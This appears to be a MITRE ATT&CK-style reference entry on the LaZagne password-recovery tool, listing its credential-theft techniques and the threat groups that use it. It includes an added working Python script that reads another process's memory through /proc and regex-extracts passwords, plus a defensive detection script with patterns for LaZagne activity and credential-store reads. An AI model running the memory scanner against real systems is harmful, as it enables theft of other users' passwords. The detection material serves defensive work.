LaZagne

LaZagne is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. LaZagne is publicly available on GitHub.(Citation: GitHub LaZagne Dec 2018)
ID: S0349
Type: TOOL
Platforms: Windows
Version: 1.6
Created: 30 Jan 2019
Last Modified: 04 Apr 2024

Techniques Used

Domain      ID         Name                                                              Use
Enterprise  T1555.001  Credentials from Password Stores: Keychain

LaZagne can obtain credentials from macOS Keychains.(Citation: GitHub LaZagne Dec 2018)

Enterprise  T1555.003  Credentials from Password Stores: Credentials from Web Browsers

LaZagne can obtain credentials from web browsers such as Google Chrome, Internet Explorer, and Firefox.(Citation: GitHub LaZagne Dec 2018)

Enterprise  T1555.004  Credentials from Password Stores: Windows Credential Manager

LaZagne can obtain credentials from Windows Credential Manager Vault files.(Citation: GitHub LaZagne Dec 2018)

Enterprise  T1003.001  OS Credential Dumping: LSASS Memory

LaZagne can perform credential dumping from LSASS memory to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)

Enterprise  T1003.004  OS Credential Dumping: LSA Secrets

LaZagne can perform credential dumping from LSA secrets to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)

Enterprise  T1003.005  OS Credential Dumping: Cached Domain Credentials

LaZagne can dump cached domain credentials (MSCache) to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)

Enterprise  T1003.007  OS Credential Dumping: Proc Filesystem

LaZagne can use the /proc/<pid>/maps and /proc/<pid>/mem files to read a browser process's memory and run regex patterns over it to dump cleartext passwords.(Citation: GitHub LaZagne Dec 2018)(Citation: Picus Labs Proc Dump 2022)

Enterprise  T1003.008  OS Credential Dumping: /etc/passwd and /etc/shadow

LaZagne can obtain credential information from /etc/shadow using the shadow.py module.(Citation: GitHub LaZagne Dec 2018)

Enterprise  T1552.001  Unsecured Credentials: Credentials In Files

LaZagne can obtain credentials from chat clients, databases, mail clients, and WiFi configuration files.(Citation: GitHub LaZagne Dec 2018)
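
The Proc Filesystem row above (T1003.007) describes the mechanism in one sentence; the following script, an added example rather than LaZagne's own code, carries it out end to end on Linux: parse /proc/<pid>/maps, keep the regions that can actually be read, pull them through /proc/<pid>/mem, and run regexes over the bytes. The two patterns, the sample maps excerpt and the planted secret are constructed for illustration; LaZagne ships browser-specific patterns instead. Reading another process needs ptrace rights, which is the check a hardened host relies on, so the demo scans its own process.

```python
"""Scan a Linux process's memory for credential-like strings through /proc.

Added example, not LaZagne's own code: it reproduces the T1003.007 technique
by walking /proc/<pid>/maps, reading the readable regions through
/proc/<pid>/mem, and running regexes over the bytes. The two patterns, the
sample maps text and the planted secret are constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Constructed patterns: form-encoded and JSON-style password fields.
PATTERNS = [
    re.compile(rb"password=([^&\s\x00]{1,64})"),
    re.compile(rb"\"pass(?:word)?\"\s*:\s*\"([^\"\x00]{1,64})\""),
]

# Constructed /proc/<pid>/maps excerpt (used by the stand-alone checks).
SAMPLE_MAPS = """\
5581a2c00000-5581a2c01000 r--p 00000000 08:01 1234567 /usr/bin/python3
5581a3e2f000-5581a3f10000 rw-p 00000000 00:00 0 [heap]
7f3a1c000000-7f3a1c021000 rw-p 00000000 00:00 0
7fff8e3f4000-7fff8e3f6000 r--p 00000000 00:00 0 [vvar]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0 [vsyscall]
"""


@dataclass(frozen=True)
class Region:
    start: int
    end: int
    perms: str
    path: str


# One maps line: "start-end perms offset dev inode [path]"
_MAPS_RE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+\S+\s+\S+\s+\S+\s*(.*)$")


def parse_maps(text: str) -> List[Region]:
    """Parse maps output into Region records; unparseable lines are skipped."""
    regions = []
    for line in text.splitlines():
        m = _MAPS_RE.match(line.strip())
        if m:
            regions.append(Region(int(m.group(1), 16), int(m.group(2), 16),
                                  m.group(3), m.group(4).strip()))
    return regions


def readable(regions: Iterable[Region], max_size: int = 64 << 20) -> List[Region]:
    """Keep regions worth reading: readable, not vvar/vsyscall/device maps, bounded size."""
    keep = []
    for r in regions:
        if r.perms[0] != "r" or r.end - r.start > max_size:
            continue
        if r.path in ("[vvar]", "[vsyscall]") or r.path.startswith("/dev/"):
            continue
        keep.append(r)
    return keep


def find_credentials(data: bytes, patterns=PATTERNS) -> List[bytes]:
    """Return every captured secret from every pattern, in pattern order."""
    return [m.group(1) for pat in patterns for m in pat.finditer(data)]


def scan_process(pid: Optional[int] = None) -> List[Tuple[Region, bytes]]:
    """Read each readable region of a process through /proc/<pid>/mem and scan it.

    Another process's memory requires ptrace rights (CAP_SYS_PTRACE, or a Yama
    ptrace_scope that allows it); /proc/self needs no privilege at all.
    """
    base = f"/proc/{pid}" if pid is not None else "/proc/self"
    with open(f"{base}/maps") as f:
        regions = readable(parse_maps(f.read()))
    results = []
    with open(f"{base}/mem", "rb", buffering=0) as mem:
        for r in regions:
            try:
                mem.seek(r.start)
                data = mem.read(r.end - r.start)
            except (OSError, ValueError, OverflowError):
                continue  # guard pages and mappings that refuse reads
            results.extend((r, hit) for hit in find_credentials(data))
    return results


if __name__ == "__main__":
    # Plant a constructed secret on our own heap, then recover it via /proc/self.
    planted = b"user=alice&password=Tr0ub4dor&3&submit=1"
    for region, secret in scan_process():
        # Expect some noise: the pattern sources themselves live in memory too.
        print(f"{region.start:#x}-{region.end:#x} {region.path or '[anon]'}: {secret!r}")
```

The defensive reading of the same code: the only thing standing between an unprivileged user and another user's browser process here is the kernel's ptrace access check, so `kernel.yama.ptrace_scope` (1 or higher) and keeping browser processes out of the attacker's UID are the controls that matter, not the file permissions on /proc.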

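For the SOC side of the table, the following script is an added example (not from ATT&CK or the LaZagne project) that maps endpoint telemetry back to the rows above: LaZagne's own binary name, a renamed binary still carrying LaZagne's module names and output switches (taken from the project's README; verify against the version you are hunting), a non-allowlisted process reading LSASS memory (T1003.001), and reads of browser credential databases or Credential Manager vault files (T1555.003/.004). Event field names follow Sysmon EventID 1 and 10 and Windows Security 4663 (which needs a SACL on the credential files); the sample events and the LSASS-reader allowlist are constructed for illustration.

```python
"""Map endpoint telemetry to the LaZagne sub-techniques listed above.

Added example, not from ATT&CK or the LaZagne project. Event fields follow
Sysmon (EventID 1 ProcessCreate, EventID 10 ProcessAccess) and Windows
Security 4663 (object access; needs a SACL on the credential files). The
sample events and the LSASS-reader allowlist are constructed for
illustration and need tuning per environment.
"""
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]
Finding = Tuple[str, str, Event]  # (ATT&CK / software ID, reason, event)

# Module names and switches as documented in LaZagne's README: a renamed
# binary still has to be told which module to run and how to report.
MODULES = re.compile(
    r"(?i)(?:^|\s)(all|browsers|windows|wifi|mails|chats|databases|memory|sysadmin)(?=\s|$)")
SWITCHES = re.compile(r"(?i)\s-(oN|oJ|oA|vv|password)\b")

PROCESS_VM_READ = 0x0010  # access right any LSASS memory reader must hold
# Constructed allowlist of legitimate LSASS readers; extend it from baselining.
LSASS_READER_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Credential stores named in the table: browser DBs and Credential Manager vaults.
CRED_FILES = re.compile(
    r"(?i)(\\login data$|\\logins\.json$|\\key4\.db$|\\microsoft\\vault\\|\\microsoft\\credentials\\)")


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_process_create(ev: Event) -> List[Finding]:
    image, cmd = ev.get("Image", ""), ev.get("CommandLine", "")
    original = ev.get("OriginalFileName", "").lower()
    if "lazagne" in _base(image) or "lazagne" in original:
        return [("S0349", "LaZagne image name or PE OriginalFileName", ev)]
    if MODULES.search(cmd) and SWITCHES.search(cmd):
        return [("S0349", "LaZagne module and switch on a renamed binary", ev)]
    return []


def check_process_access(ev: Event) -> List[Finding]:
    if _base(ev.get("TargetImage", "")) != "lsass.exe":
        return []
    if ev.get("SourceImage", "").lower() in LSASS_READER_ALLOWLIST:
        return []
    try:
        granted = int(ev.get("GrantedAccess", "0"), 16)
    except ValueError:
        return []
    if granted & PROCESS_VM_READ:
        return [("T1003.001", f"non-allowlisted process read LSASS (GrantedAccess={granted:#x})", ev)]
    return []


def check_file_access(ev: Event) -> List[Finding]:
    m = CRED_FILES.search(ev.get("ObjectName", ""))
    if not m:
        return []
    store = m.group(1).lower()
    tech = "T1555.004" if "vault" in store or "credentials" in store else "T1555.003"
    return [(tech, f"read of credential store {ev['ObjectName']}", ev)]


def analyze(events: List[Event]) -> List[Finding]:
    """Route each event to the matching rule by EventID and collect findings."""
    rules = {"1": check_process_create, "10": check_process_access, "4663": check_file_access}
    findings: List[Finding] = []
    for ev in events:
        rule = rules.get(ev.get("EventID", ""))
        if rule:
            findings.extend(rule(ev))
    return findings


# Constructed sample telemetry: a LaZagne run, a renamed LaZagne run, benign
# noise, a suspicious LSASS read, a benign LSASS read, two credential-store reads.
SAMPLE_EVENTS: List[Event] = [
    {"EventID": "1", "Image": r"C:\Users\alice\Downloads\laZagne.exe",
     "CommandLine": "laZagne.exe all -oJ", "OriginalFileName": ""},
    {"EventID": "1", "Image": r"C:\Users\alice\AppData\Local\Temp\svc.exe",
     "CommandLine": "svc.exe browsers -vv", "OriginalFileName": "svc.exe"},
    {"EventID": "1", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir all", "OriginalFileName": "Cmd.Exe"},
    {"EventID": "10", "SourceImage": r"C:\Users\alice\AppData\Local\Temp\svc.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": "10", "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": "4663", "ObjectName": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"EventID": "4663", "ObjectName": r"C:\Users\alice\AppData\Local\Microsoft\Vault\example-guid\example.vcrd"},
]

if __name__ == "__main__":
    for tech, reason, ev in analyze(SAMPLE_EVENTS):
        print(f"{tech:<10} {reason}")
```

The module-plus-switch rule is deliberately weaker than the name match and exists because renaming the PyInstaller binary is the first thing an operator does; on its own a bare `all` or `browsers` argument is far too common to alert on, which is why the rule also demands one of the output switches.
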
Groups That Use This Software

ID     Name             References
G0077  Leafminer        (Citation: Symantec Leafminer July 2018)
G0102  Wizard Spider    (Citation: Mandiant FIN12 Oct 2021)
G0022  APT3             (Citation: Symantec Buckeye)
G1015  Scattered Spider (Citation: MSTIC Octo Tempest Operations October 2023)
G0049  OilRig           (Citation: FireEye APT35 2018)
G0069  MuddyWater       (Citation: Symantec MuddyWater Dec 2018) (Citation: TrendMicro POWERSTATS V3 June 2019)
G0100  Inception        (Citation: Kaspersky Cloud Atlas August 2019)
G0064  APT33            (Citation: Symantec Elfin Mar 2019)
G0139  TeamTNT          (Citation: ATT TeamTNT Chimaera September 2020)
G0131  Tonto Team       (Citation: TrendMicro Tonto Team October 2020)
G0120  Evilnum          (Citation: ESET EvilNum July 2020)
G1024  Akira            (Citation: Arctic Wolf Akira 2023)

References

  1. Zanni, A. (n.d.). The LaZagne Project !!!. Retrieved December 14, 2018.
  2. Symantec Security Response. (2018, July 25). Leafminer: New Espionage Campaigns Targeting Middle Eastern Regions. Retrieved August 28, 2018.
  3. Shilko, J., et al. (2021, October 7). FIN12: The Prolific Ransomware Intrusion Threat Actor That Has Aggressively Pursued Healthcare Targets. Retrieved June 15, 2023.
  4. Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. Retrieved September 26, 2016.
  5. Microsoft. (2023, October 25). Octo Tempest crosses boundaries to facilitate extortion, encryption, and destruction. Retrieved March 18, 2024.
  6. Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.
  7. Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.
  8. Lunghi, D. and Horejsi, J. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.
  9. GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.
  10. Symantec Security Response Attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S. Retrieved April 10, 2019.
  11. AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021.
  12. Lunghi, D. and Horejsi, J. (2020, October 2). Tonto Team - Exploring the TTPs of an advanced threat actor operating a large infrastructure. Retrieved October 17, 2021.
  13. Yuceel, H. C. and Picus Labs. (2022, March 22). Retrieved March 31, 2023.
  14. Porolli, M. (2020, July 9). More evil: A deep look at Evilnum and its toolset. Retrieved January 22, 2021.
  15. Campbell, S., Suthar, A. and Belfiorre, C. (2023, July 26). Conti and Akira: Chained Together. Retrieved February 20, 2024.
